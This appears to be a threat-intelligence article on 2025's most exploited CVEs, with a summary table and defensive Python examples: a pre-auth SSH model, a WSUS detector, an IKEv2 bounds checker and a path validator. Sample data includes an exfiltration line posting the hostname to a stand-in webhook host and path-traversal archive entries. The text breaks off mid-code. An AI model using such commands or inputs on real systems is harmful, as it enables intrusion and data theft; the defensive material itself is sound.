The cybersecurity landscape of 2025 has been marked by an unprecedented surge in vulnerability exploitation, with threat actors leveraging critical flaws across enterprise software, cloud infrastructure, and industrial systems.
This analysis examines the twenty most dangerous exploited vulnerabilities of the year, highlighting their technical details, exploitation techniques, and the urgent need for organizations to prioritize patching and defense strategies.
The numerically scored entries average a CVSS score of roughly 8.5, with two reaching the maximum score of 10.0, underscoring the critical nature of these security flaws.
Table Detailing Most Exploited Vulnerabilities of 2025

| CVE ID | Vulnerability Title | CVSS v3.1 Score | Affected Product | Vulnerability Type | Authentication Required | Active Exploitation | Disclosure Date | CISA KEV Status | Primary Attack Vector |
|---|---|---|---|---|---|---|---|---|---|
| CVE-2025-55182 | React2Shell – React Server Components RCE | 10.0 (Critical) | React Server Components (Meta) | Deserialization / Unauthenticated RCE | No (Unauthenticated) | Yes – Mesh Agent malware, cryptocurrency miners | December 3, 2025 | Added December 2025 | Network / Web Application |
| CVE-2025-62221 | Windows Cloud Files Mini Filter Driver Use-After-Free | 7.8 (High) | Windows Cloud Files Mini Filter Driver | Use-After-Free / Memory Corruption | Yes (Authenticated Local) | Yes – Patch Tuesday December 2025 | December 9, 2025 | Added December 2025 | Local System Access |
| CVE-2025-6218 | WinRAR Path Traversal Remote Code Execution | 7.8 (High) | WinRAR 7.11 and earlier | Path Traversal / Arbitrary File Extraction | No (Unauthenticated – Archive File) | Yes – APT-C-08, GOFFEE, Bitter | March 2025 / June 2025 patch | Added December 2025 | User Interaction (Archive File) |
| CVE-2025-48633 | Android Framework Information Disclosure | High (Not Specified) | Android 13-16 Framework | Information Disclosure / Sandbox Bypass | No (Malicious App) | Yes – State actors (limited, targeted) | December 2, 2025 | Added December 2025 | Mobile Application / Malicious App |
| CVE-2025-48572 | Android Framework Privilege Escalation | High (Not Specified) | Android 13-16 Framework | Privilege Escalation / Unauthorized Activity | No (Malicious App) | Yes – State actors (limited, targeted) | December 2, 2025 | Added December 2025 | Mobile Application / Malicious App |
| CVE-2025-5777 | CitrixBleed 2 – Citrix NetScaler Memory Disclosure | 9.3 (Critical) | Citrix NetScaler ADC/Gateway | Out-of-Bounds Read / Session Hijacking | No (Unauthenticated) | Yes – RansomHub, multiple threat groups | June 17, 2025 | Added July 2025 (24-hr deadline) | Network / VPN Gateway |
| CVE-2025-48384 | Git Arbitrary File Write on Non-Windows Systems | 8.0-8.1 (High) | Git on macOS and Linux | Arbitrary File Write / Git Hook Execution | No (Unauthenticated – Repository Clone) | Yes – Sophisticated social engineering | July 8, 2025 | Added August 2025 | Network / Git Repository |
| CVE-2025-41244 | VMware Aria Tools Local Privilege Escalation | 7.8 (High) | VMware Aria Operations, VMware Tools | Untrusted Search Path / Local PrivEsc | Yes (Local User) | Yes – State actor UNC5174 (Chinese APT) | September 29, 2025 | State actor exploitation (not KEV) | Local System Access |
| CVE-2025-9242 | WatchGuard Firebox IKEv2 Out-of-Bounds Write | 9.3 (Critical) | WatchGuard Firebox (Fireware OS) | Out-of-Bounds Write / Stack Overflow | No (Unauthenticated) | Yes – Confirmed KEV listing | September 17, 2025 | Added November 2025 | Network / VPN IKEv2 Protocol |
| CVE-2025-12480 | Gladinet Triofox Improper Access Control | 9.1 (Critical) | Gladinet Triofox | Improper Access Control / Authentication Bypass | No (Unauthenticated) | Yes – UNC6485 cluster | November 12, 2025 (public) | Added November 2025 | Network / HTTP Access |
| CVE-2025-62215 | Windows Kernel Race Condition Privilege Escalation | 7.0 (High) | Windows Kernel (all supported OS) | Race Condition / Double Free Heap Corruption | Yes (Authenticated Local) | Yes – Confirmed KEV listing | November 11, 2025 | Added November 2025 | Local System Access |
| CVE-2025-4664 | Google Chrome Cross-Origin Data Leak | 8.8 (High) | Google Chrome < 136.0.7103.113 | Cross-Origin Data Leak / Referrer Policy Bypass | No (Unauthenticated – User Interaction) | Yes – Confirmed KEV listing | May 14, 2025 | Added May 2025 | Network / Web Browser |
| CVE-2025-59287 | Microsoft WSUS Deserialization Remote Code Execution | 9.8 (Critical) | Microsoft WSUS (Windows Server Update Services) | Unsafe Deserialization / Gadget Chain RCE | No (Unauthenticated) | Yes – Widespread exploitation, public PoC | October 23, 2025 (emergency patch) | Added October 2025 | Network / WSUS Ports 8530/8531 |
| CVE-2025-32463 | Sudo Chroot Privilege Escalation | 9.3 (Critical) | Sudo 1.9.14-1.9.17 | Relative Path Traversal / Privilege Escalation | Yes (Local User) | Yes – Confirmed KEV listing | June 2025 | Added October 2025 | Local System Access |
| CVE-2025-20333 | Cisco ASA/FTD Buffer Overflow Remote Code Execution | 9.9 (Critical) | Cisco ASA/FTD | Buffer Overflow / VPN Authentication Bypass | Yes (Authenticated VPN) | Yes – ArcaneDoor (UAT4356), state sponsored | September 24, 2025 | Added September 2025 (Emergency Directive) | Network / VPN Authentication |
| CVE-2025-20362 | Cisco ASA/FTD Missing Authorization Authentication Bypass | 6.5 (Medium) | Cisco ASA/FTD | Missing Authorization / Access Control Flaw | No (Unauthenticated) | Yes – ArcaneDoor chain with CVE-2025-20333 | September 24, 2025 | Added September 2025 (Emergency Directive) | Network / Firewall Management |
| CVE-2025-10585 | Google Chrome V8 Type Confusion Remote Code Execution | 8.8 (High) | Google Chrome < 140.0.7339.185 | Type Confusion / Memory Corruption RCE | No (Unauthenticated – User Interaction) | Yes – Google TAG confirmed | September 16, 2025 | Added September 2025 | Network / Web Browser |
| CVE-2025-5086 | DELMIA Apriso Deserialization of Untrusted Data RCE | 9.0 (Critical) | DELMIA Apriso (Release 2020-2025) | Unsafe Deserialization / Gadget Chain RCE | No (Unauthenticated) | Yes – SANS ISC observed | June 2, 2025 (patch), September 11 (KEV) | Added September 2025 | Network / HTTP SOAP Request |
| CVE-2025-53690 | Sitecore ViewState Deserialization Remote Code Execution | 9.0 (Critical) | Sitecore Experience Manager/Platform | ViewState Deserialization / Gadget Chain RCE | No (Unauthenticated – Known Machine Key) | Yes – Mandiant Threat Defense confirmed | September 2, 2025 | Added September 2025 | Network / Web Application |
| CVE-2025-32433 | Erlang/OTP SSH Daemon Pre-Authentication RCE | 10.0 (Critical) | Erlang/OTP SSH Daemon | SSH Protocol Parsing / Pre-Auth RCE | No (Pre-Authentication) | Yes – OT environment targeting | April 16, 2025 | Confirmed active exploitation | Network / SSH Protocol |
Most Exploited Vulnerabilities of 2025
CVE-2025-55182: React2Shell
The most critical vulnerability of 2025, CVE-2025-55182, dubbed “React2Shell,” represents a watershed moment in web application security. Disclosed on December 3, 2025, by Meta, this unauthenticated remote code execution flaw in React Server Components received the maximum CVSS score of 10.0. The vulnerability stems from insecure deserialization within the React Server Components (RSC) Flight protocol, where the server processes RSC payloads without adequate validation.
According to Wiz Research, 39% of cloud environments contain vulnerable instances, making this one of the most widespread critical vulnerabilities in recent history.
The flaw affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0, as well as downstream frameworks such as Next.js. Security researchers confirmed that default configurations are vulnerable, meaning a standard Next.js application created with create-next-app can be exploited without any code changes by its developers.
Rapid7 validated working proof-of-concept exploits within 48 hours of disclosure, and by December 8, 2025, exploitation attempts were being detected on honeypots worldwide.
The exploitation methodology involves crafting malicious RSC payloads that trigger server-side execution logic, allowing attackers to run arbitrary JavaScript with the privileges of the server process. Organizations observed attackers deploying Mesh Agent malware and cryptocurrency miners via PowerShell commands executed through the vulnerability.
CVE-2025-32433: Erlang/OTP SSH Zero-Day Crisis
CVE-2025-32433 is another maximum-severity vulnerability (CVSS 10.0), affecting the Erlang/OTP SSH daemon and disclosed on April 16, 2025. This pre-authentication remote code execution flaw allows attackers to execute arbitrary code without completing the SSH authentication process, exploiting improper handling of SSH protocol messages during the pre-authentication phase.
The vulnerability affects Erlang/OTP versions 27.3.2 and earlier, 26.2.5.10 and earlier, and 25.3.2.19 and earlier, as well as older, unsupported release lines back to OTP 17.0. Erlang/OTP is foundational technology used by organizations including Ericsson, Cisco, and WhatsApp, making this vulnerability particularly dangerous for telecommunications, messaging platforms, IoT infrastructure, and financial services.
Palo Alto Networks reported that between May 1 and May 9, 2025, exploitation attempts surged sharply, with 70% of observed detections coming from firewalls protecting operational technology environments. The attack method involves sending SSH_MSG_CHANNEL_OPEN messages before authentication to open session channels, followed by SSH_MSG_CHANNEL_REQUEST messages carrying malicious “exec” payloads. If the SSH daemon runs with elevated privileges such as root, successful exploitation grants full system control.
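The message ordering described above, as an added example (not Erlang/OTP code, and not the OTP fix): a toy SSH server dispatcher in Python, first with the vulnerable behaviour of acting on SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST before authentication, then with the gate a correct dispatcher applies. The message numbers are the real RFC 4253/4254 values; the password check, channel bookkeeping and payload dictionaries are simplified stand-ins.

```python
"""Toy model of an SSH server's message dispatcher. Added example, not code
from Erlang/OTP: it shows the bug class behind CVE-2025-32433 (connection-
protocol messages honoured before user authentication completes) next to the
gate that a correct dispatcher applies. Message numbers are the real ones
from RFC 4253 and RFC 4254; the password check and handlers are stand-ins."""

SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98


class SshServerModel:
    def __init__(self, gate_connection_messages):
        # True  -> corrected behaviour: reject channel traffic until authenticated
        # False -> vulnerable behaviour: channel traffic is dispatched regardless
        self.gate_connection_messages = gate_connection_messages
        self.authenticated = False
        self.disconnected = False
        self.channels = set()
        self.executed = []          # commands that reached the "exec" handler

    def handle(self, msg_type, payload):
        """Dispatch one decoded SSH message; returns the reply (or action) name."""
        if self.disconnected:
            return "IGNORED: connection closed"
        if msg_type == SSH_MSG_USERAUTH_REQUEST:
            if payload.get("password") == "correct horse":   # stand-in credential check
                self.authenticated = True
                return "SSH_MSG_USERAUTH_SUCCESS"
            return "SSH_MSG_USERAUTH_FAILURE"
        if msg_type in (SSH_MSG_CHANNEL_OPEN, SSH_MSG_CHANNEL_REQUEST):
            if self.gate_connection_messages and not self.authenticated:
                # Connection-protocol messages are only valid after the userauth
                # service has succeeded; anything earlier is a protocol error.
                self.disconnected = True
                return "SSH_MSG_DISCONNECT: protocol error"
            if msg_type == SSH_MSG_CHANNEL_OPEN:
                self.channels.add(payload["channel_id"])
                return "SSH_MSG_CHANNEL_OPEN_CONFIRMATION"
            if payload["channel_id"] not in self.channels:
                return "SSH_MSG_CHANNEL_FAILURE"
            if payload.get("request") == "exec":
                self.executed.append(payload["command"])
                return "SSH_MSG_CHANNEL_SUCCESS"
            return "SSH_MSG_CHANNEL_FAILURE"
        return "SSH_MSG_UNIMPLEMENTED"


def replay_preauth_exec(gate_connection_messages):
    """Replay the message order the text describes, with no authentication at all.
    Returns (replies, commands_executed). The payloads are constructed samples."""
    server = SshServerModel(gate_connection_messages)
    replies = [
        server.handle(SSH_MSG_CHANNEL_OPEN, {"channel_id": 0, "type": "session"}),
        server.handle(SSH_MSG_CHANNEL_REQUEST,
                      {"channel_id": 0, "request": "exec", "command": "id"}),
    ]
    return replies, server.executed


if __name__ == "__main__":
    print("vulnerable:", replay_preauth_exec(False))
    print("fixed:     ", replay_preauth_exec(True))
```

Run directly, the vulnerable model reports the “exec” request succeeding without a single SSH_MSG_USERAUTH_REQUEST having been seen, while the gated model disconnects on the first channel message. Because SSH traffic after key exchange is encrypted, this ordering violation is visible only to the server itself, which is why the fix has to live in the daemon rather than in a network sensor.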
CVE-2025-59287: Microsoft WSUS Deserialization Vulnerability
Microsoft Windows Server Update Services became a prime target in 2025 through CVE-2025-59287, a critical remote code execution vulnerability with a CVSS score of 9.8. Disclosed with an out-of-band emergency patch on October 23, 2025, this flaw stems from unsafe deserialization of untrusted data in the WSUS service.
The vulnerability allows unauthenticated attackers to send crafted requests to WSUS endpoints on ports 8530 and 8531, achieving code execution with SYSTEM privileges. According to Huntress and Unit 42, attackers exploited the flaw by targeting the GetCookie() endpoint and the ReportingWebService, causing improper deserialization of AuthorizationCookie objects through the insecure BinaryFormatter and SoapFormatter.
Initial exploitation was observed in the wild as process chains in which wsusservice.exe and w3wp.exe spawned cmd.exe and powershell.exe to run Base64-encoded reconnaissance commands. Attackers collected information with whoami, net user /domain, and ipconfig /all, exfiltrating the output to remote webhook endpoints.
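A detection for the process chain described above, added here as an example (not Huntress or Unit 42 code): it runs over constructed process-creation events standing in for Sysmon Event ID 1 or EDR telemetry, flags a shell spawned by wsusservice.exe or w3wp.exe, and decodes any PowerShell -EncodedCommand argument, since the reconnaissance commands are otherwise hidden in Base64. PIDs, paths and the webhook host are made up.

```python
"""Process-chain detection for the WSUS post-exploitation pattern. Added
example, not Huntress or Unit 42 code: it runs over constructed
process-creation events (dicts standing in for Sysmon event 1 or EDR
telemetry) and decodes PowerShell -EncodedCommand payloads so the
reconnaissance commands are visible to the analyst. Paths, PIDs and the
webhook host are made up."""
import base64
import re

WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RECON_MARKERS = ("whoami", "net user", "ipconfig", "webhook")
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line):
    """PowerShell's -EncodedCommand takes Base64 of UTF-16LE text; return it decoded."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(image_path):
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return an alert dict if a WSUS process spawned a shell, else None."""
    parent, child = basename(event["parent_image"]), basename(event["image"])
    if parent not in WSUS_PARENTS or child not in SHELLS:
        return None
    decoded = decode_encoded_command(event["command_line"])
    visible = (decoded or event["command_line"]).lower()
    return {
        "pid": event["pid"],
        "parent": parent,
        "child": child,
        "decoded": decoded,
        "recon": [k for k in RECON_MARKERS if k in visible],
    }


def detect(events):
    return [alert for alert in map(classify, events) if alert]


def build_sample_events():
    """Constructed sample telemetry (not a real capture)."""
    recon = "whoami; net user /domain; ipconfig /all"
    enc = base64.b64encode(recon.encode("utf-16-le")).decode()
    return [
        {"pid": 4120,
         "parent_image": r"C:\Program Files\Update Services\Service\WsusService.exe",
         "image": r"C:\Windows\System32\cmd.exe",
         "command_line": "cmd.exe /c powershell.exe -nop -w hidden -enc " + enc},
        {"pid": 4132,
         "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "command_line": 'powershell.exe -nop -c "iwr https://webhook.invalid/c -Method POST -Body $env:COMPUTERNAME"'},
        {"pid": 4140,                      # benign: not a WSUS parent
         "parent_image": r"C:\Windows\explorer.exe",
         "image": r"C:\Windows\System32\cmd.exe",
         "command_line": "cmd.exe /c dir"},
    ]


if __name__ == "__main__":
    for alert in detect(build_sample_events()):
        print(alert)
```

On a real WSUS host w3wp.exe also serves ordinary IIS traffic, so the parent-child pair is what carries the signal; the decoded command line is there for triage, not for the match.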
The vulnerability was added to CISA’s Known Exploited Vulnerabilities catalog immediately after disclosure, and a public proof-of-concept exploit accelerated widespread attacks.
CVE-2025-62221: Windows Cloud Files Driver Zero-Day
Microsoft’s December 2025 Patch Tuesday included fixes for CVE-2025-62221, a use-after-free elevation of privilege vulnerability in the Windows Cloud Files Mini Filter Driver that was actively exploited as a zero-day. With a CVSS score of 7.8, this vulnerability allows authenticated local attackers to escalate privileges to SYSTEM without user interaction.
The flaw is a use-after-free condition, in which code continues to use a block of memory that has already been freed and returned to the allocator. CISA confirmed active exploitation by adding the vulnerability to its Known Exploited Vulnerabilities catalog on December 9, 2025, requiring Federal Civilian Executive Branch agencies to apply updates by December 30, 2025.
Security researchers noted that the vulnerability is particularly dangerous because it affects the Cloud Files Mini Filter Driver, a core Windows component managing cloud storage integration that is present even when applications such as OneDrive, Google Drive, or iCloud are not installed.
The low attack complexity and minimal privilege requirements make exploitation accessible to many potential attackers, enabling threat actors to disable security tooling, access sensitive information, move laterally across networks, and establish persistent high-privilege access.
CVE-2025-62215: Windows Kernel Race Condition Zero-Day
November 2025’s Patch Tuesday addressed CVE-2025-62215, a race condition vulnerability in the Windows Kernel with a CVSS score of 7.0 that was actively exploited in the wild. The vulnerability, discovered by the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC), allows authenticated attackers with low privileges to elevate their access to SYSTEM.
The race condition involves concurrent execution using a shared resource with improper synchronization (CWE-362). Attackers exploit it by running specially crafted programs that repeatedly trigger the timing window, forcing multiple threads to access the same kernel resource without proper synchronization. This confuses the kernel’s memory handling and causes it to free the same memory block twice, a “double free” that corrupts the kernel heap and gives attackers a path to overwrite memory and seize control of execution flow.
Security experts assess that CVE-2025-62215 is primarily used after initial compromise via phishing, RCE, or sandbox escape to elevate privileges, harvest credentials, and move laterally. The vulnerability affects all currently supported Windows editions, including Windows 10, Windows 11, Windows Server 2019 through Windows Server 2025, and Windows 10 Extended Security Updates (ESU). CISA set a remediation date of December 3, 2025, for federal agencies.
CVE-2025-48572 and CVE-2025-48633: Android Framework Zero-Days
Google’s December 2025 Android Security Bulletin addressed over 100 vulnerabilities, including two high-severity zero-days in the Android Framework that CISA added to its KEV catalog on December 2, 2025. CVE-2025-48572 is an elevation of privilege vulnerability allowing malicious apps to launch unauthorized activities from the background without user interaction. CVE-2025-48633 is an information disclosure flaw enabling apps to access sensitive system memory, potentially bypassing Android’s sandboxing protections.
Both vulnerabilities affect Android versions 13 through 16 and were confirmed to be under “limited, targeted exploitation” in the wild, likely by state actors or commercial surveillance tools targeting high-value individuals. CVE-2025-48633 exists in the hasAccountsOnAnyUser method of DevicePolicyManagerService.java, where a logic error allows attackers to add a Device Owner after provisioning, leading to local escalation of privilege. CVE-2025-48572 stems from a permissions bypass in the Android Frameworks Base package, allowing unauthorized background activity launches.
Security researchers note that these vulnerabilities are particularly dangerous when chained, with CVE-2025-48633 used to exfiltrate sensitive data or escape the application sandbox and CVE-2025-48572 used to gain system-level privileges. Federal agencies were required to apply patches by December 23, 2025.
CVE-2025-5777: CitrixBleed 2
CVE-2025-5777, dubbed “CitrixBleed 2” because of its similarities to the 2023 CitrixBleed vulnerability (CVE-2023-4966), is a critical out-of-bounds read in Citrix NetScaler ADC and Gateway with a CVSS score of 9.3. Disclosed on June 17, 2025, and added to CISA’s KEV catalog on July 11 with an unprecedented 24-hour patching deadline, this vulnerability allows attackers to leak sensitive memory contents, including authentication tokens and session cookies.
The vulnerability affects NetScaler appliances configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server. According to security researcher Kevin Beaumont, exploitation began as early as mid-June 2025, with one of the source IP addresses linked to RansomHub ransomware activity. GreyNoise data shows exploitation attempts from 10 unique malicious IP addresses located in Bulgaria, the United States, China, Egypt, and Finland over 30 days, primarily targeting the United States, France, Germany, India, and Italy.
Attackers send specially crafted HTTP requests to vulnerable Citrix appliances, which respond with chunks of memory containing session data. Using leaked session tokens, attackers can hijack active VPN sessions, bypass multi-factor authentication, and reach internal systems without credentials. Horizon3.ai researchers located the vulnerable code in the nsppe binary (NetScaler Packet Parsing Engine) and found that the configuration utilities administrators use to manage NetScaler Gateway endpoints share the same vulnerable memory region, leaving session tokens belonging to the “nsroot” user exposed to theft as well.
CVE-2025-20333 and CVE-2025-20362: Cisco Firewall Exploitation Chain
Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) suffered from two vulnerabilities exploited in the wild as zero-days before patches became available. CVE-2025-20333, with a CVSS score of 9.9, is a buffer overflow in the VPN web server component that allows authenticated attackers to execute arbitrary code as root. CVE-2025-20362, with a CVSS score of 6.5, is a missing authorization vulnerability that lets unauthenticated attackers reach restricted URL endpoints.
CISA issued Emergency Directive 25-03 on September 25, 2025, confirming active exploitation and widespread scanning. The agency attributed the exploitation to the same threat actor behind ArcaneDoor (UAT4356), a state-sponsored espionage campaign first observed in 2024. The U.K. National Cyber Security Centre (NCSC) reported attacks delivering malware such as RayInitiator and LINE VIPER.
The exploitation chain uses CVE-2025-20362 to bypass authentication with crafted HTTP(S) requests, then chains CVE-2025-20333 to achieve root-level remote code execution. On November 5, 2025, Cisco warned of a new attack variant that causes unpatched devices to reload unexpectedly, producing a denial-of-service condition. The vulnerabilities affect Cisco ASA versions 9.16–9.23 and Cisco FTD versions 7.0–7.7.
CVE-2025-9242: WatchGuard Firebox Out-of-Bounds Write Crisis
WatchGuard Firebox firewalls faced significant exploitation through CVE-2025-9242, an out-of-bounds write vulnerability in the iked process of WatchGuard Fireware OS with a CVSS score of 9.3. Disclosed on September 17, 2025, and added to CISA’s KEV catalog on November 12, 2025, this vulnerability allows remote unauthenticated attackers to execute arbitrary code.
The vulnerability affects both mobile user VPN with IKEv2 and branch office VPN using IKEv2 when configured with a dynamic gateway peer. watchTowr Labs researchers identified the flaw as a stack-based buffer overflow and noted the lack of modern exploit mitigations in the enterprise-grade appliance. The vulnerability affects Fireware OS versions 11.10.2 through 11.12.4_Update1, 12.0 through 12.11.3, and 2025.1.
Patch analysis revealed changes within /usr/bin/iked, specifically in the ike2_ProcessPayload_CERT function, where missing length validation allowed crafted IKEv2 certificate payloads to overflow a stack buffer. The unauthenticated portion of IKEv2 consists of the two initial exchanges, IKE_SA_INIT and IKE_AUTH, and the vulnerable code is reached while processing the second of them, so an attacker needs to send only two packets to reach the vulnerable code path.
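The length check that the text says was missing, as an added example (not WatchGuard or iked code): a Python walker for the IKEv2 generic payload header of RFC 7296 that validates every declared payload length against the bytes actually received and refuses certificate data that would not fit a fixed-size buffer. CERT_BUFFER_LEN is an assumed value chosen for the example, and the payload chains are constructed rather than captured.

```python
"""Bounds-checked walker for IKEv2 generic payload headers (RFC 7296 s3.2),
added as an example of the length validation the CERT payload handler
lacked. It is not WatchGuard code and does not reproduce the iked
implementation; CERT_BUFFER_LEN is an assumed fixed-size buffer and the
messages are constructed."""
import struct

IKEV2_NO_NEXT_PAYLOAD = 0
IKEV2_PAYLOAD_CERT = 37
IKEV2_PAYLOAD_NONCE = 40
GENERIC_HEADER_LEN = 4          # Next Payload (1) | C+Reserved (1) | Payload Length (2)
CERT_BUFFER_LEN = 256           # assumption: size of the fixed stack buffer being protected


class MalformedIkePayload(ValueError):
    pass


def parse_cert_body(body):
    """CERT payload body: 1-byte Cert Encoding followed by Certificate Data.
    Rejects data that would not fit the fixed buffer (the missing check)."""
    if len(body) < 1:
        raise MalformedIkePayload("CERT payload has no encoding byte")
    cert_data = body[1:]
    if len(cert_data) > CERT_BUFFER_LEN:
        raise MalformedIkePayload("certificate data of %d bytes exceeds %d-byte buffer"
                                  % (len(cert_data), CERT_BUFFER_LEN))
    return body[0], cert_data


def walk_payloads(data, first_payload):
    """Parse a payload chain; returns [(payload_type, body), ...] or raises."""
    payloads, offset, current = [], 0, first_payload
    while current != IKEV2_NO_NEXT_PAYLOAD:
        if len(data) - offset < GENERIC_HEADER_LEN:
            raise MalformedIkePayload("truncated payload header at offset %d" % offset)
        next_payload, _flags, length = struct.unpack_from("!BBH", data, offset)
        if length < GENERIC_HEADER_LEN:
            raise MalformedIkePayload("payload length %d is smaller than its header" % length)
        if offset + length > len(data):
            raise MalformedIkePayload("payload length %d overruns the message" % length)
        body = data[offset + GENERIC_HEADER_LEN:offset + length]
        if current == IKEV2_PAYLOAD_CERT:
            parse_cert_body(body)
        payloads.append((current, body))
        offset += length
        current = next_payload
    if offset != len(data):
        raise MalformedIkePayload("%d trailing bytes after the last payload" % (len(data) - offset))
    return payloads


def check_message(data, first_payload):
    """Convenience wrapper: 'ok' or the rejection reason."""
    try:
        walk_payloads(data, first_payload)
        return "ok"
    except MalformedIkePayload as exc:
        return "rejected: %s" % exc


def build_payload(next_payload, body):
    return struct.pack("!BBH", next_payload, 0, GENERIC_HEADER_LEN + len(body)) + body


def build_sample_chain(cert_len):
    """Constructed CERT -> NONCE chain such as IKE_AUTH might carry (not a capture).
    Cert Encoding 4 = 'X.509 Certificate - Signature'."""
    cert_body = bytes([4]) + b"\x30" * cert_len
    return (build_payload(IKEV2_PAYLOAD_NONCE, cert_body)
            + build_payload(IKEV2_NO_NEXT_PAYLOAD, b"\xaa" * 16))


if __name__ == "__main__":
    print(check_message(build_sample_chain(100), IKEV2_PAYLOAD_CERT))
    print(check_message(build_sample_chain(1000), IKEV2_PAYLOAD_CERT))
    print(check_message(build_sample_chain(100)[:-5], IKEV2_PAYLOAD_CERT))
```

A CERT payload whose declared length is consistent with the message but whose data exceeds the buffer is the case that matters here; the truncation and overrun checks catch the cheaper malformations that any IKE parser must handle before it ever looks at payload contents.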
Because the attack potential includes disabling security tooling, accessing sensitive information, moving laterally across networks, and establishing persistent high-privilege access, organizations were urged to patch outside normal patch cycles.
CVE-2025-6218: WinRAR Path Traversal Exploitation
WinRAR, one of the most popular file archiving utilities worldwide, suffered from CVE-2025-6218, a path traversal vulnerability with a CVSS score of 7.8 affecting versions 7.11 and earlier. Disclosed in March 2025 and patched in WinRAR 7.12 Beta 1 in June 2025, the vulnerability was added to CISA’s KEV catalog on December 10, 2025, after active exploitation by multiple threat groups was confirmed.
The vulnerability stems from improper path validation in WinRAR’s RARReadHeader and RARProcessFile routines, which fail to normalize or validate relative path components such as ‘../’ and ‘..’. A malicious archive containing crafted entry paths can extract files outside the intended folder, for example placing an executable in the Windows Startup folder for automatic execution at the next login. The flaw is exploitable whether the archive entry’s stored path is absolute or relative.
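The path validation an extractor needs, as an added example (not WinRAR code): entry names are normalised to one separator, absolute names, drive-letter names and UNC names are rejected, any ‘..’ component is rejected outright, and the final target is resolved and checked against the extraction directory. The entry names, including the Startup-folder variant described above, are constructed.

```python
"""Archive-entry path validation of the kind an extractor must do before
writing to disk. Added example, not WinRAR code: it normalises separators,
rejects absolute, drive-relative and UNC names as well as any '..'
component, and resolves the final target under the extraction directory.
The entry names below are constructed samples."""
import posixpath
import re

DRIVE_PREFIX_RE = re.compile(r"^[A-Za-z]:")


def normalize_entry_name(name):
    """Treat both separators alike; RAR entries from Windows use backslashes."""
    return name.replace("\\", "/")


def is_safe_entry_path(entry_name):
    """True only if the entry can be written somewhere beneath the target directory."""
    name = normalize_entry_name(entry_name)
    if not name or "\x00" in name:
        return False
    if name.startswith("/") or DRIVE_PREFIX_RE.match(name):
        return False                      # absolute, UNC ('//server/share') or 'C:' prefix
    parts = name.split("/")
    if ".." in parts:
        return False                      # reject any parent reference, even a self-cancelling one
    return True


def resolve_extraction_target(dest_dir, entry_name):
    """Final path for a safe entry; raises ValueError for anything that would escape."""
    if not is_safe_entry_path(entry_name):
        raise ValueError("refusing to extract %r" % entry_name)
    dest = posixpath.normpath(dest_dir)
    target = posixpath.normpath(posixpath.join(dest, normalize_entry_name(entry_name)))
    if target != dest and not target.startswith(dest + "/"):
        raise ValueError("%r resolves outside %r" % (entry_name, dest))
    return target


STARTUP = r"AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

# Constructed entry names, including the Startup-folder trick described in the text.
SAMPLE_ENTRIES = [
    "docs/readme.txt",
    r"images\logo.png",
    r"..\..\..\Users\victim\%s\update.exe" % STARTUP,
    "../../../../etc/cron.d/job",
    r"C:\Users\victim\%s\update.exe" % STARTUP,
    r"\\fileserver\share\payload.exe",
    "safe/../also-safe/file.txt",         # still rejected: '..' is never allowed
]


def triage(entries):
    """Map each entry name to whether extraction would be allowed."""
    return {e: is_safe_entry_path(e) for e in entries}


if __name__ == "__main__":
    for entry, ok in triage(SAMPLE_ENTRIES).items():
        print("ALLOW" if ok else "BLOCK", entry)
```

Rejecting every ‘..’ component, rather than only those that resolve outside the target, is deliberate: an extractor has no legitimate reason to accept one, and the stricter rule cannot be defeated by separator or normalization tricks the resolver does not know about.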
Multiple threat actors were observed exploiting this vulnerability, including GOFFEE (Paper Werewolf), Bitter (APT-C-08/Manlinghua), and Gamaredon. SecPod researchers documented a targeted cyber-espionage campaign attributed to APT-C-08 against government organizations in South Asia, using phishing emails carrying malicious RAR archives. The payload was a C# trojan that contacts external servers for command and control and supports keylogging, screenshot capture, RDP credential harvesting, and file exfiltration.
CVE-2025-48384: Git Arbitrary File Write Vulnerability
The widely used Git version control system faced exploitation through CVE-2025-48384, a high-severity vulnerability (CVSS 8.0–8.1) affecting macOS and Linux installations, disclosed on July 8, 2025. CISA added it to the KEV catalog on August 26, 2025, with a remediation deadline of September 15, 2025, after confirming active exploitation.
The vulnerability stems from Git’s inconsistent handling of carriage return characters when parsing configuration files and submodule paths. When reading a config value, Git strips trailing carriage return and line feed (CRLF) characters, but when writing a config entry, a value with a trailing CR is not quoted, so the CR is lost when the config is later read back. Attackers craft a malicious .gitmodules file whose submodule path ends in a carriage return; when the repository is cloned recursively with git clone --recursive, the inconsistency between the two parses lets the submodule be checked out to an attacker-chosen path.
CrowdStrike identified active exploitation combining sophisticated social engineering with malicious Git repository cloning. The exploitation places a symlink in the repository and uses the carriage return confusion to write attacker-controlled content directly into the submodule’s hooks directory, which Git then executes as part of the normal submodule checkout. Datadog researchers noted that the vulnerability can also be abused to overwrite a victim’s Git configuration files, transparently exfiltrating intellectual property such as proprietary source code to attacker servers.
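A pre-clone audit of .gitmodules for the pattern described above, added as an example (not Git project code). It parses the file as raw bytes so that a carriage return inside a quoted path survives, which is the character Git’s own read/write round trip loses, and flags paths containing a CR, absolute paths, ‘..’ components and paths that step into .git. The symlink that redirects the checkout lives in the tree rather than in .gitmodules, so this check is necessary but not sufficient; the sample file and its URLs are constructed.

```python
"""Pre-clone audit of a .gitmodules file for the path tricks behind
CVE-2025-48384. Added example, not Git project code: it parses the file as
raw bytes (so a carriage return inside a quoted path survives, exactly the
character Git's own reader/writer round trip loses) and flags paths that
contain CR, are absolute, contain '..' or step into .git. The sample file
and its URLs are constructed."""
import re

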